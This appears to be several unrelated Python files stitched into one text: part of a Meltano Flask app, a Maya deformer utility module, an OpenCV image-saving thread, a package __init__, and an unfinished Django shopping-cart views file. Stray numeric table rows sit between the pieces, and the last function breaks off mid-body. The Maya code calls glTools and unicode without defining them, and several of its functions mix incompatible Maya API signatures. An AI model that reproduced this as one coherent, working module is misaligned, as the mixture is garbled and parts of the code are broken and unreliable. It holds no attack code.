        # setup the appUrl
        appUrl = urlsplit(request.host_url)
        g.jsContext = {"appUrl": appUrl.geturl()[:-1]}
        if tracker.send_anonymous_usage_stats:
            g.jsContext["isSendAnonymousUsageStats"] = True
            g.jsContext["projectId"] = tracker.project_id
        g.jsContext["version"] = meltano.__version__
        # setup the airflowUrl
        try:
            airflow = ConfigService(project).find_plugin("airflow")
            settings = PluginSettingsService(project)
            airflow_port, _ = settings.get_value(
                db.session, airflow, "webserver.web_server_port"
            )
            g.jsContext["airflowUrl"] = appUrl._replace(
                netloc=f"{appUrl.hostname}:{airflow_port}"
            ).geturl()[:-1]
        except (PluginMissingError, PluginSettingMissingError):
            # Airflow is optional; the frontend simply omits the link.
            pass
        # setup the dbtDocsUrl
        g.jsContext["dbtDocsUrl"] = appUrl._replace(path="/-/dbt/").geturl()[:-1]

    @app.after_request
    def after_request(res):
        """Log each request and stamp the Meltano version header."""
        request_message = f"[{request.url}]"
        if request.method != "OPTIONS":
            request_message += f" as {current_user}"
        logger.info(request_message)
        res.headers["X-Meltano-Version"] = meltano.__version__
        return res

    return app
| 4,490 | 1,366 |
import maya.cmds as cmds
import re
import rsTools.utils.openMaya.dataUtils as dUtils
import maya.OpenMayaAnim as OpenMayaAnimOld
import maya.OpenMaya as OpenMayaOld
import maya.api.OpenMaya as om
import maya.api.OpenMayaAnim as oma
def isDeformer(deformer):
    """Return True if *deformer* exists and inherits from geometryFilter."""
    if not cmds.objExists(deformer):
        return False
    # nodeType(..., i=1) returns the full inheritance list.
    return bool(cmds.nodeType(deformer, i=1).count('geometryFilter'))
'''
isDeformer("rig_normalPushq")
getDeformerList("pSphere1",nodeType='geometryFilter')
getDeformerFn("rig_normalPushq")
getDeformerSet("rig_normalPushq")
getDeformerSetFn("rig_normalPushq")
q = getDeformerSetMembers("rig_normalPushq")
p = getDeformerSetMemberStrList("rig_normalPushq")
s = getAffectedGeometry("rig_normalPushq")
weights = getWeights("rig_normalPushq")
'''
def getAttributes(deformer):
    """Return [[attrName, value], ...] for every keyable attribute of
    *deformer*, skipping the per-point 'weightList.weights' compound.
    """
    # BUG FIX: cmds.listAttr returns None when nothing is keyable, which
    # previously crashed the `in` test below.
    attrs = cmds.listAttr(deformer, k=True) or []
    if "weightList.weights" in attrs:
        attrs.remove("weightList.weights")
    output = []
    for a in attrs:
        attr = str(deformer + "." + a)
        output.append([attr, cmds.getAttr(attr)])
    return output
def getAttributesAndConnections(deformer):
    """Return [[attrName, value, incomingPlug-or-None], ...] for every
    keyable attribute of *deformer* (skipping 'weightList.weights').
    """
    # BUG FIX: cmds.listAttr returns None when nothing is keyable, which
    # previously crashed the `in` test below.
    attrs = cmds.listAttr(deformer, k=True) or []
    if "weightList.weights" in attrs:
        attrs.remove("weightList.weights")
    output = []
    for a in attrs:
        attr = str(deformer + "." + a)
        val = cmds.getAttr(attr)
        # Source plug driving this attribute, if any.
        connections = cmds.listConnections(attr, s=True, d=False, p=True)
        output.append([attr, val, connections[0] if connections else None])
    return output
def getDeformerList(affectedGeometry=None, nodeType='geometryFilter', regexFilter=''):
    """List deformer nodes in the scene (or in the history of the given
    geometry), excluding tweak and transferAttributes nodes.

    @param affectedGeometry: optional geometry (str or list) to restrict
        the search to; falsy means "whole scene" (default was [], None is
        equivalent and avoids a mutable default).
    @param nodeType: node type to list (default 'geometryFilter')
    @param regexFilter: optional regex; only matching names are returned
    """
    # Get Deformer List
    deformerNodes = cmds.ls(type=nodeType)
    if affectedGeometry:
        if isinstance(affectedGeometry, str):
            affectedGeometry = [affectedGeometry]
        historyNodes = cmds.listHistory(
            affectedGeometry, groupLevels=True, pruneDagObjects=True)
        deformerNodes = cmds.ls(historyNodes, type=nodeType)
    # Remove duplicates, preserving order.
    # BUG FIX: this used to call aUtils.removeDuplicates(), but no `aUtils`
    # module is imported in this file (NameError at runtime).
    deformerNodes = list(dict.fromkeys(deformerNodes))
    # Remove Tweak Nodes
    tweakNodes = cmds.ls(deformerNodes, type='tweak')
    if tweakNodes:
        deformerNodes = [x for x in deformerNodes if x not in tweakNodes]
    # Remove TransferAttributes Nodes
    transferAttrNodes = cmds.ls(deformerNodes, type='transferAttributes')
    if transferAttrNodes:
        deformerNodes = [x for x in deformerNodes if x not in transferAttrNodes]
    if regexFilter:
        reFilter = re.compile(regexFilter)
        # BUG FIX: bare filter() is a lazy iterator on Python 3; return a list
        # to match the other code paths.
        deformerNodes = [x for x in deformerNodes if reFilter.search(x)]
    return deformerNodes
def listMeshDeformers(mesh):
    """Return all deformers in *mesh*'s history, excluding tweak and
    transferAttributes nodes."""
    historyNodes = cmds.listHistory(
        mesh, groupLevels=True, pruneDagObjects=True)
    deformerNodes = cmds.ls(historyNodes, type="geometryFilter")
    # Remove duplicates, preserving order.
    # BUG FIX: this used to call aUtils.removeDuplicates(), but no `aUtils`
    # module is imported in this file (NameError at runtime).
    deformerNodes = list(dict.fromkeys(deformerNodes))
    # remove tweak
    tweakNodes = cmds.ls(deformerNodes, type='tweak')
    if tweakNodes:
        deformerNodes = [x for x in deformerNodes if x not in tweakNodes]
    # remove transfer nodes
    transferAttrNodes = cmds.ls(deformerNodes, type='transferAttributes')
    if transferAttrNodes:
        deformerNodes = [x for x in deformerNodes if x not in transferAttrNodes]
    return deformerNodes
def getDeformerFn(deformer):
    """Return an MFnGeometryFilter function set for *deformer*.

    Raises if the node does not exist or is not a geometry filter.
    """
    if not cmds.objExists(deformer):
        raise Exception('Deformer '+deformer+' does not exist!')
    deformerObj = dUtils.getMObject(deformer)
    try:
        return oma.MFnGeometryFilter(deformerObj)
    except:
        raise Exception(
            'Could not get a geometry filter for deformer "'+deformer+'"!')
def getDeformerSet(deformer):
    """Return the name of the deformer set (objectSet) driven by *deformer*.

    :raises Exception: if the node is missing, is not a geometryFilter,
        or has no associated deformer set.
    """
    # Checks
    if not cmds.objExists(deformer):
        raise Exception('Deformer '+deformer+' does not exist!')
    if not isDeformer(deformer):
        raise Exception('Object '+deformer+' is not a valid deformer!')
    # Get Deformer Set
    deformerObj = dUtils.getMObject(deformer)
    deformerFn = oma.MFnGeometryFilter(deformerObj)
    # NOTE(review): deformerSet accessed as a property (API 2.0 style) --
    # confirm against the maya.api.OpenMayaAnim version in use.
    deformerSetObj = deformerFn.deformerSet
    if deformerSetObj.isNull():
        raise Exception('Unable to determine deformer set for "'+deformer+'"!')
    # Return Result
    return om.MFnDependencyNode(deformerSetObj).name()
def getDeformerSetFn(deformer):
    """Return an MFnSet function set attached to *deformer*'s deformer set."""
    if not cmds.objExists(deformer):
        raise Exception('Deformer '+deformer+' does not exist!')
    # Resolve the set name first, then wrap its MObject in an MFnSet.
    setName = getDeformerSet(deformer)
    return om.MFnSet(dUtils.getMObject(setName))
def getDeformerSetMembers(deformer, geometry=''):
    '''
    Return the deformer set members of the specified deformer.
    You can specify a shape name to query deformer membership for.
    Otherwise, membership for the first affected geometry will be returned.
    NOTE(review): the original comment promised a [dagPath, components]
    pair, but the code below returns only getDagPath(geomIndex) -- confirm
    the API 2.0 MSelectionList accessor that callers actually need.
    @param deformer: Deformer to query set membership for
    @type deformer: str
    @param geometry: Geometry to query deformer set membership for. Optional.
    @type geometry: str
    '''
    # Get deformer function sets
    deformerSetFn = getDeformerSetFn(deformer)
    # Get deformer set members (flattened selection list, API 2.0 style)
    deformerSetSel = deformerSetFn.getMembers(True)
    # Get geometry index
    if geometry:
        geomIndex = getGeomIndex(geometry, deformer)
    else:
        geomIndex = 0
    # Get number of selection components
    deformerSetLen = deformerSetSel.length()
    if geomIndex >= deformerSetLen:
        raise Exception('Geometry index out of range! (Deformer: "'+deformer+'", Geometry: "' +
                        geometry+'", GeoIndex: '+str(geomIndex)+', MaxIndex: '+str(deformerSetLen)+')')
    # Get deformer set members
    data = deformerSetSel.getDagPath(geomIndex)
    # Return result
    return data
def getDeformerSetMemberStrList(deformer, geometry=''):
    '''
    Return the deformer set members of the specified deformer as a list of strings.
    You can specify a shape name to query deformer membership for.
    Otherwise, membership for the first affected geometry will be returned.
    NOTE(review): this body uses legacy API 1.0 call signatures
    (getMembers(list, flag) filling an out-arg, getSelectionStrings(out))
    on API 2.0 objects from maya.api.* -- in API 2.0 both calls RETURN
    their results instead. Verify against a live Maya session before use.
    @param deformer: Deformer to query set membership for
    @type deformer: str
    @param geometry: Geometry to query deformer set membership for. Optional.
    @type geometry: str
    '''
    # Get deformer function sets
    deformerSetFn = getDeformerSetFn(deformer)
    # Get deformer set members
    deformerSetSel = om.MSelectionList()
    deformerSetFn.getMembers(deformerSetSel, True)
    # Convert to list of strings
    setMemberStr = []
    deformerSetSel.getSelectionStrings(setMemberStr)
    # Flatten component ranges (e.g. "vtx[0:5]") into individual entries.
    setMemberStr = cmds.ls(setMemberStr, fl=True)
    # Return Result
    return setMemberStr
def getDeformerSetMemberIndices(deformer, geometry=''):
    """Return the component indices of *geometry* that are members of
    *deformer*'s set: flat ints for single-indexed geometry (mesh, curve,
    particle), [u, v] pairs for nurbsSurface, [s, t, u] triples for lattice.

    NOTE(review): uses legacy API 1.0 out-argument signatures
    (MIntArray() filled by getElements) on maya.api (2.0) classes, and
    indexes deformerSetMem[1] although getDeformerSetMembers currently
    returns a bare dagPath -- verify in a live Maya session.
    """
    # Check geometry
    geo = geometry
    if cmds.objectType(geometry) == 'transform':
        try:
            geometry = cmds.listRelatives(
                geometry, s=True, ni=True, pa=True)[0]
        except:
            raise Exception('Object "'+geo+'" is not a valid geometry!')
    # Get geometry type
    geometryType = cmds.objectType(geometry)
    # Get deformer set members
    deformerSetMem = getDeformerSetMembers(deformer, geometry)
    # ==========================
    # - Get Set Member Indices -
    # ==========================
    memberIdList = []
    # Single Index
    if geometryType == 'mesh' or geometryType == 'nurbsCurve' or geometryType == 'particle':
        memberIndices = om.MIntArray()
        singleIndexCompFn = om.MFnSingleIndexedComponent(deformerSetMem[1])
        singleIndexCompFn.getElements(memberIndices)
        memberIdList = list(memberIndices)
    # Double Index
    if geometryType == 'nurbsSurface':
        memberIndicesU = om.MIntArray()
        memberIndicesV = om.MIntArray()
        doubleIndexCompFn = om.MFnDoubleIndexedComponent(deformerSetMem[1])
        doubleIndexCompFn.getElements(memberIndicesU, memberIndicesV)
        for i in range(memberIndicesU.length()):
            memberIdList.append([memberIndicesU[i], memberIndicesV[i]])
    # Triple Index
    if geometryType == 'lattice':
        memberIndicesS = om.MIntArray()
        memberIndicesT = om.MIntArray()
        memberIndicesU = om.MIntArray()
        tripleIndexCompFn = om.MFnTripleIndexedComponent(deformerSetMem[1])
        tripleIndexCompFn.getElements(
            memberIndicesS, memberIndicesT, memberIndicesU)
        for i in range(memberIndicesS.length()):
            memberIdList.append(
                [memberIndicesS[i], memberIndicesT[i], memberIndicesU[i]])
    # Return result
    return memberIdList
def getAffectedGeometry(deformer, returnShapes=False, fullPathNames=False):
    '''
    Return a dict mapping each geometry affected by the deformer to its
    geometry index on the deformer.
    @param deformer: Deformer to query output geometry for
    @type deformer: str
    @param returnShapes: Return shape node names instead of parent transforms
    @type returnShapes: bool
    @param fullPathNames: Use full DAG paths as dictionary keys
    @type fullPathNames: bool
    '''
    # Verify Input
    if not isDeformer(deformer):
        raise Exception('Object "'+deformer+'" is not a valid deformer!')
    # Initialize Return Array (dict)
    affectedObjects = {}
    # Get MFnGeometryFilter
    deformerObj = dUtils.getMObject(deformer)
    geoFilterFn = oma.MFnGeometryFilter(deformerObj)
    # Get Output Geometry
    # (removed stray no-op debug call: dir(outputObjectArray))
    outputObjectArray = geoFilterFn.getOutputGeometry()
    # Iterate Over Affected Geometry
    for i in range(len(outputObjectArray)):
        # Get Output Connection at Index
        outputIndex = geoFilterFn.indexForOutputShape(outputObjectArray[i])
        outputNode = om.MFnDagNode(om.MObject(outputObjectArray[i]))
        # Check Return Shapes
        if not returnShapes:
            outputNode = om.MFnDagNode(outputNode.parent(0))
        # Check Full Path
        if fullPathNames:
            affectedObjects[outputNode.fullPathName()] = int(outputIndex)
        else:
            affectedObjects[outputNode.partialPathName()] = int(outputIndex)
    # Return Result
    return affectedObjects
def getGeomIndex(geometry, deformer):
    '''
    Returns the geometry index of a shape to a specified deformer.
    @param geometry: Name of shape or parent transform to query
    @type geometry: str
    @param deformer: Name of deformer to query
    @type deformer: str
    '''
    # Verify input
    if not isDeformer(deformer):
        raise Exception('Object "'+deformer+'" is not a valid deformer!')
    # Check geometry
    geo = geometry
    if cmds.objectType(geometry) == 'transform':
        # Narrowed from a bare except: listRelatives returns None for a
        # transform with no shapes, so indexing raises TypeError/IndexError.
        try:
            geometry = cmds.listRelatives(
                geometry, s=True, ni=True, pa=True)[0]
        except (TypeError, IndexError):
            raise Exception('Object "'+geo+'" is not a valid geometry!')
    geomObj = dUtils.getMObject(geometry)
    # Get geometry index
    deformerObj = dUtils.getMObject(deformer)
    deformerFn = oma.MFnGeometryFilter(deformerObj)
    # Narrowed from a bare except: Maya raises RuntimeError when the shape is
    # not deformed by this deformer.
    try:
        geomIndex = deformerFn.indexForOutputShape(geomObj)
    except Exception:
        raise Exception('Object "'+geometry +
                        '" is not affected by deformer "'+deformer+'"!')
    # Return result
    return geomIndex
def findInputShape(shape):
    '''
    Return the input shape ('...ShapeOrig') for the specified shape node.
    This function assumes that the specified shape is affected by at least one valid deformer.
    @param shape: The shape node to find the corresponding input shape for.
    @type shape: str
    '''
    # Checks
    if not cmds.objExists(shape):
        raise Exception('Shape node "'+shape+'" does not exist!')
    # Get inMesh connection
    inMeshConn = cmds.listConnections(
        shape+'.inMesh', source=True, destination=False, shapes=True)
    if not inMeshConn:
        # No incoming connection: the shape is its own input
        return shape
    # Check direct mesh (outMesh -> inMesh) connection
    if str(cmds.objectType(inMeshConn[0])) == 'mesh':
        return inMeshConn[0]
    # Find connected deformer
    # (kGeometryFilt is the Maya MFn enum name for geometry-filter nodes)
    deformerObj = dUtils.getMObject(inMeshConn[0])
    if not deformerObj.hasFn(om.MFn.kGeometryFilt):
        # Incoming node is not a deformer: fall back to history search
        deformerHist = cmds.ls(cmds.listHistory(shape), type='geometryFilter')
        if not deformerHist:
            # Best-effort: warn and return the shape itself rather than raise
            print('findInputShape.py: Shape node "'+shape +
                  '" has incoming inMesh connections but is not affected by any valid deformers! Returning "'+shape+'"!')
            return shape
            #raise Exception('Shape node "'+shape+'" is not affected by any valid deformers!')
        else:
            deformerObj = dUtils.getMObject(deformerHist[0])
    # Get deformer function set
    deformerFn = oma.MFnGeometryFilter(deformerObj)
    # Get input shape for deformer
    shapeObj = dUtils.getMObject(shape)
    geomIndex = deformerFn.indexForOutputShape(shapeObj)
    inputShapeObj = deformerFn.inputShapeAtIndex(geomIndex)
    # Return result
    return om.MFnDependencyNode(inputShapeObj).name()
def renameDeformerSet(deformer, deformerSetName=''):
    '''
    Rename the deformer set connected to the specified deformer
    @param deformer: Name of the deformer whose deformer set you want to rename
    @type deformer: str
    @param deformerSetName: New name for the deformer set. If left as default, new name will be (deformer+"Set")
    @type deformerSetName: str
    '''
    # Verify input
    if not isDeformer(deformer):
        raise Exception('Object "'+deformer+'" is not a valid deformer!')
    # Check deformer set name
    if not deformerSetName:
        deformerSetName = deformer+'Set'
    # Find the deformer set; listConnections returns None when there is no
    # objectSet connection, so guard before indexing (was a TypeError crash).
    deformerSetConn = cmds.listConnections(deformer+'.message', type='objectSet')
    if not deformerSetConn:
        raise Exception('Unable to find deformer set for "'+deformer+'"!')
    deformerSet = deformerSetConn[0]
    # Rename deformer set
    if deformerSet != deformerSetName:
        deformerSetName = cmds.rename(deformerSet, deformerSetName)
    # Return result
    return deformerSetName
def getWeights(deformer, geometry=None):
    '''
    Return the deformer weights for the given geometry as a flat float list.
    @param deformer: Deformer to query weights from
    @type deformer: str
    @param geometry: Geometry (shape or transform) to query. Defaults to the
        first geometry affected by the deformer.
    @type geometry: str
    '''
    # Check Deformer
    if not isDeformer(deformer):
        raise Exception('Object "'+deformer+'" is not a valid deformer!')
    # Check Geometry (list() keeps this working on Python 3 dict views)
    if not geometry:
        geometry = list(getAffectedGeometry(deformer).keys())[0]
    # Get Geometry Shape (only descend when given a transform)
    geoShape = geometry
    if geometry and cmds.objectType(geoShape) == 'transform':
        geoShape = cmds.listRelatives(geometry, s=True, ni=True)[0]
    # Get deformer set via the legacy OpenMaya API; the
    # MFnWeightGeometryFilter.getWeights signature used below only exists there.
    deformerObjOld = dUtils.getMObjectOld(deformer)
    deformerFn = OpenMayaAnimOld.MFnGeometryFilter(deformerObjOld)
    deformerSetObj = deformerFn.deformerSet()
    deformerSetName = OpenMayaOld.MFnDependencyNode(deformerSetObj).name()
    deformerSetObj = dUtils.getMObjectOld(deformerSetName)
    deformerSetFn = OpenMayaOld.MFnSet(deformerSetObj)
    deformerSetSel = OpenMayaOld.MSelectionList()
    deformerSetFn.getMembers(deformerSetSel, True)
    deformerSetPath = OpenMayaOld.MDagPath()
    deformerSetComp = OpenMayaOld.MObject()
    deformerSetSel.getDagPath(0, deformerSetPath, deformerSetComp)
    # Get weights for the set members
    deformerFn = OpenMayaAnimOld.MFnWeightGeometryFilter(deformerObjOld)
    weightList = OpenMayaOld.MFloatArray()
    deformerFn.getWeights(deformerSetPath, deformerSetComp, weightList)
    # Return result
    return list(weightList)
def setWeights(deformer, weights, geometry=None):
    '''
    Set the deformer weights for the given geometry from a flat float list.
    @param deformer: Deformer to set weights on
    @type deformer: str
    @param weights: Weight values to apply (one per set member component)
    @type weights: list
    @param geometry: Geometry (shape or transform). Defaults to the first
        geometry affected by the deformer.
    @type geometry: str
    '''
    # Check Deformer
    if not isDeformer(deformer):
        raise Exception('Object "'+deformer+'" is not a valid deformer!')
    # Check Geometry (list() keeps this working on Python 3 dict views)
    if not geometry:
        geometry = list(getAffectedGeometry(deformer).keys())[0]
    # Get Geometry Shape. Only descend when given a transform, matching
    # getWeights(); the original called listRelatives unconditionally and
    # crashed (None[0]) when passed a shape node directly.
    geoShape = geometry
    if geometry and cmds.objectType(geoShape) == 'transform':
        geoShape = cmds.listRelatives(geometry, s=True, ni=True)[0]
    # Build weight array (plain loop instead of a side-effect comprehension)
    weightList = OpenMayaOld.MFloatArray()
    for w in weights:
        weightList.append(w)
    deformerObjOld = dUtils.getMObjectOld(deformer)
    # Get deformer set via the legacy OpenMaya API
    deformerFn = OpenMayaAnimOld.MFnGeometryFilter(deformerObjOld)
    deformerSetObj = deformerFn.deformerSet()
    deformerSetName = OpenMayaOld.MFnDependencyNode(deformerSetObj).name()
    deformerSetObj = dUtils.getMObjectOld(deformerSetName)
    deformerSetFn = OpenMayaOld.MFnSet(deformerSetObj)
    deformerSetSel = OpenMayaOld.MSelectionList()
    deformerSetFn.getMembers(deformerSetSel, True)
    deformerSetPath = OpenMayaOld.MDagPath()
    deformerSetComp = OpenMayaOld.MObject()
    deformerSetSel.getDagPath(0, deformerSetPath, deformerSetComp)
    # Apply the weights to the set members
    deformerFn = OpenMayaAnimOld.MFnWeightGeometryFilter(deformerObjOld)
    deformerFn.setWeight(deformerSetPath, deformerSetComp, weightList)
def bindPreMatrix(deformer, bindPreMatrix='', parent=True):
    '''
    Create a bindPreMatrix transform for the specified deformer.
    @param deformer: Deformer to create bind pre matrix transform for
    @type deformer: str
    @param bindPreMatrix: Specify existing transform for bind pre matrix connection. If empty, create a new transform
    @type bindPreMatrix: str
    @param parent: Parent the deformer handle to the bind pre matrix transform
    @type parent: bool
    '''
    # Check deformer
    if not isDeformer(deformer):
        raise Exception('Object "'+deformer+'" is not a valid deformer!')
    if not cmds.objExists(deformer+'.bindPreMatrix'):
        raise Exception('Deformer "'+deformer +
                        '" does not accept bindPreMatrix connections!')
    # Get deformer handle (transform driving the .matrix input)
    deformerHandle = cmds.listConnections(deformer+'.matrix', s=True, d=False)
    if deformerHandle:
        deformerHandle = deformerHandle[0]
    else:
        raise Exception('Unable to find deformer handle!')
    # Check bindPreMatrix
    if bindPreMatrix:
        if not cmds.objExists(bindPreMatrix):
            bindPreMatrix = cmds.createNode('transform', n=bindPreMatrix)
    else:
        # Build bindPreMatrix transform, named from the handle's prefix
        prefix = deformerHandle.replace(deformerHandle.split('_')[-1], '')
        bindPreMatrix = cmds.createNode('transform', n=prefix+'bindPreMatrix')
    # Match transform first, then pivot (order matters: the pivot is set in
    # world space relative to the already-matched transform)
    cmds.xform(bindPreMatrix, ws=True, matrix=cmds.xform(
        deformerHandle, q=True, ws=True, matrix=True))
    cmds.xform(bindPreMatrix, ws=True, piv=cmds.xform(
        deformerHandle, q=True, ws=True, rp=True))
    # Connect inverse matrix to localize cluster
    cmds.connectAttr(
        bindPreMatrix+'.worldInverseMatrix[0]', deformer+'.bindPreMatrix', f=True)
    # Parent
    if parent:
        cmds.parent(deformerHandle, bindPreMatrix)
    # Return result
    return bindPreMatrix
def pruneWeights(deformer, geoList=[], threshold=0.001):
    '''
    Set deformer component weights to 0.0 if the original weight value is below the set threshold
    @param deformer: Deformer to prune weights on
    @type deformer: str
    @param geoList: The geometry objects whose components are checked for weight pruning
    @type geoList: list
    @param threshold: The weight threshold for removal
    @type threshold: float
    '''
    # Check deformer
    if not cmds.objExists(deformer):
        raise Exception('Deformer "'+deformer+'" does not exist!')
    # Check geometry
    if type(geoList) == str:
        geoList = [geoList]
    if not geoList:
        geoList = cmds.deformer(deformer, q=True, g=True)
    if not geoList:
        raise Exception('No geometry to prune weight for!')
    for geo in geoList:
        if not cmds.objExists(geo):
            raise Exception('Geometry "'+geo+'" does not exist!')
    # For each geometry, zero out weights at or below the threshold.
    # (Removed an unused getDeformerSetMemberIndices() call whose result was
    # never read.)
    for geo in geoList:
        weightList = getWeights(deformer, geo)
        pWeightList = [wt if wt > threshold else 0.0 for wt in weightList]
        setWeights(deformer, pWeightList, geo)
def pruneMembershipByWeights(deformer, geoList=[], threshold=0.001):
    '''
    Remove components from a specified deformer set if their weight value is below the set threshold
    @param deformer: Deformer to remove components from
    @type deformer: str
    @param geoList: The geometry objects whose components are checked for removal
    @type geoList: list
    @param threshold: The weight threshold for removal
    @type threshold: float
    '''
    # Check deformer
    if not cmds.objExists(deformer):
        raise Exception('Deformer "'+deformer+'" does not exist!')
    # Check geometry
    if type(geoList) == str:
        geoList = [geoList]
    if not geoList:
        geoList = cmds.deformer(deformer, q=True, g=True)
    if not geoList:
        raise Exception('No geometry to prune weight for!')
    for geo in geoList:
        if not cmds.objExists(geo):
            raise Exception('Geometry "'+geo+'" does not exist!')
    # Get deformer set
    deformerSet = getDeformerSet(deformer)
    # Build the full component prune list across all geometry
    allPruneList = []
    for geo in geoList:
        # Get Component Type (e.g. 'vtx', 'cv', 'pt')
        geoType = glTools.utils.geometry.componentType(geo)
        # Get Deformer Member Indices
        memberIndexList = getDeformerSetMemberIndices(deformer, geo)
        # Get Weights
        weightList = getWeights(deformer, geo)
        # Indices whose weight is at or below the threshold
        pruneList = [memberIndexList[i] for i in range(
            len(memberIndexList)) if weightList[i] <= threshold]
        # Format indices as component strings, e.g. geo.vtx[12] or geo.cv[1][2]
        for i in range(len(pruneList)):
            if type(pruneList[i]) == str or type(pruneList[i]) == unicode or type(pruneList[i]) == int:
                pruneList[i] = '['+str(pruneList[i])+']'
            elif type(pruneList[i]) == list:
                pruneList[i] = [str(p) for p in pruneList[i]]
                pruneList[i] = '['+']['.join(pruneList[i])+']'
            pruneList[i] = geo+'.'+geoType+str(pruneList[i])
        allPruneList.extend(pruneList)
    # Prune deformer set membership.
    # BUGFIX: prune the accumulated list for ALL geometry -- the original
    # used only the last geometry's pruneList here.
    if allPruneList:
        cmds.sets(allPruneList, rm=deformerSet)
    # Return prune list
    return allPruneList
def clean(deformer, threshold=0.001):
    '''
    Clean a deformer by pruning both its weights and its set membership.
    Weights at or below the tolerance are zeroed, then the corresponding
    components are removed from the deformer set.
    @param deformer: The deformer to clean.
    @type deformer: str
    @param threshold: Weight value tolerance for prune operations.
    @type threshold: float
    '''
    print('Cleaning deformer: '+deformer+'!')
    # Validate before touching anything
    if not isDeformer(deformer):
        raise Exception('Object "'+deformer+'" is not a valid deformer!')
    # Prune weights, then membership, with the same tolerance
    glTools.utils.deformer.pruneWeights(deformer, threshold=threshold)
    glTools.utils.deformer.pruneMembershipByWeights(
        deformer, threshold=threshold)
def checkMultipleOutputs(deformer, printResult=True):
    '''
    Check the specified deformer for multiple output connections from a single plug.
    @param deformer: Deformer to check for multiple output connections
    @type deformer: str
    @param printResult: Print results to the script editor
    @type printResult: bool
    '''
    # Check deformer
    if not isDeformer(deformer):
        raise Exception('Deformer "'+deformer+'" is not a valid deformer!')
    # Get outputGeometry plug
    outGeomPlug = glTools.utils.attribute.getAttrMPlug(
        deformer+'.outputGeometry')
    if not outGeomPlug.isArray():
        raise Exception('Attribute "'+deformer +
                        '.outputGeometry" is not an array attribute!')
    # Get existing indices
    indexList = om.MIntArray()
    numIndex = outGeomPlug.getExistingArrayAttributeIndices(indexList)
    # Check output plugs
    returnDict = {}
    for i in range(numIndex):
        plugConn = cmds.listConnections(
            deformer+'.outputGeometry['+str(indexList[i])+']', s=False, d=True, p=True)
        # BUGFIX: listConnections returns None when a plug has no outgoing
        # connections; guard before len() (was a TypeError crash).
        if not plugConn:
            continue
        # Check multiple outputs
        if len(plugConn) > 1:
            # Append to return value
            returnDict[deformer+'.outputGeometry[' +
                       str(indexList[i])+']'] = plugConn
            # Print connection info
            if printResult:
                print('Deformer output "'+deformer+'.outputGeometry['+str(
                    indexList[i])+']" has '+str(len(plugConn))+' outgoing connections:')
                for conn in plugConn:
                    print('\t- '+conn)
    # Return result
    return returnDict
| 24,456 | 7,421 |
import logging
import os
from queue import Queue
from threading import Thread
from time import time
import cv2
class SaveThread(Thread):
    """Worker thread that drains a queue of (path, image) pairs and writes
    each image to disk with cv2.imwrite."""

    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            # Block until work arrives, then persist the image
            path, image = self.queue.get()
            try:
                cv2.imwrite(path, image)
            finally:
                # Always mark the task done so queue.join() can't deadlock
                self.queue.task_done()
class SaveImageWorker:
    """Asynchronous image writer backed by a single daemon SaveThread."""

    def __init__(self):
        self.save_queue = Queue()
        self.save_thread = SaveThread(self.save_queue)
        # Daemon so a forgotten worker never blocks interpreter shutdown.
        self.save_thread.daemon = True
        self.save_thread.start()

    def save_image(self, save_path, im):
        """Queue (save_path, im) for writing and return immediately."""
        self.save_queue.put((save_path, im))

    def wait(self):
        """Block until every queued image has been written.

        Added because the daemon thread otherwise silently drops any images
        still queued when the interpreter exits.
        """
        self.save_queue.join()
# Licensed under an MIT style license -- see LICENSE.md
from .utils import (
gw_results_file, functions, history_dictionary, command_line_arguments
)
__author__ = ["Charlie Hoy <charlie.hoy@ligo.org>"]
| 208 | 72 |
from django.shortcuts import render, get_object_or_404, redirect
from django.contrib import messages
from django.utils import timezone
from django.views.generic import ListView, DetailView, View
from .models import Item, Order, OrderItem, Address, Promo
from .forms import AddressForm, PromoForm
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
class HomeView(ListView):
    """Landing page listing every Item via the standard ListView context."""
    model = Item
    template_name = 'home.html'
class ProductDetail(DetailView):
    """Detail page for a single Item (looked up by the URLconf's slug/pk)."""
    model = Item
    template_name = 'product.html'
class OrderSummaryView(View):
    """Render the current user's open (ordered=False) order."""

    def get(self, *args, **kwargs):
        # NOTE(review): Order.objects.get raises Order.DoesNotExist when the
        # user has no open order -- confirm callers guarantee one exists.
        order = Order.objects.get(user=self.request.user, ordered=False)
        context = {
            'order': order
        }
        return render(self.request, 'order_summary.html', context)
def add_to_cart(request, slug):
    """Add the item identified by slug to the user's open order.

    Creates the order if none exists; if the item is already in the cart a
    notice is shown and nothing changes. Always redirects back to the
    product page.
    """
    item = get_object_or_404(Item, slug=slug)
    order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
    open_orders = Order.objects.filter(user=request.user, ordered=False)
    if not open_orders.exists():
        # No open order yet: create one and attach the cart line
        new_order = Order.objects.create(user=request.user, ordered=False, ordered_date=timezone.now())
        new_order.items.add(order_item)
        new_order.save()
        messages.success(request, f"{item.title} fue anadido al carrito")
    elif open_orders[0].items.filter(item__slug=item.slug).exists():
        # Already in the cart: just notify
        messages.success(request, f"{item.title} ya esta en el carrito")
    else:
        current_order = open_orders[0]
        current_order.items.add(order_item)
        current_order.save()
        messages.success(request, f"{item.title} fue anadido al carrito")
    return redirect('product', slug=slug)
def remove_from_cart(request, slug):
    """Delete the item's cart line from the user's open order.

    Emits a warning describing the outcome and redirects back to the
    product page in every case.
    """
    item = get_object_or_404(Item, slug=slug)
    order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
    open_orders = Order.objects.filter(user=request.user, ordered=False)
    if not open_orders.exists():
        messages.warning(request, f"{item.title} no hay una orden activa")
    elif open_orders[0].items.filter(item__slug=item.slug).exists():
        # Drop the cart line entirely
        OrderItem.objects.filter(id=order_item.id).delete()
        messages.warning(request, f"{item.title} fue eliminado del carrito")
    else:
        messages.warning(request, f"{item.title} no esta en el carrito")
    return redirect('product', slug=slug)
def add_item_quantity(request, slug):
    """Increment the cart quantity of the item identified by slug by one."""
    item = get_object_or_404(Item, slug=slug)
    # NOTE(review): if no cart line exists yet, get_or_create makes a fresh
    # one that is incremented immediately and never attached to an order --
    # confirm this view is only reachable for items already in the cart.
    order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
    order_item.quantity += 1
    order_item.save()
    return redirect('order_summary')
def remove_item_quantity(request, slug):
    """Decrement the item's cart quantity; at quantity 1, drop it from the order."""
    item = get_object_or_404(Item, slug=slug)
    order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
    order_qs = Order.objects.filter(user=request.user, ordered=False)
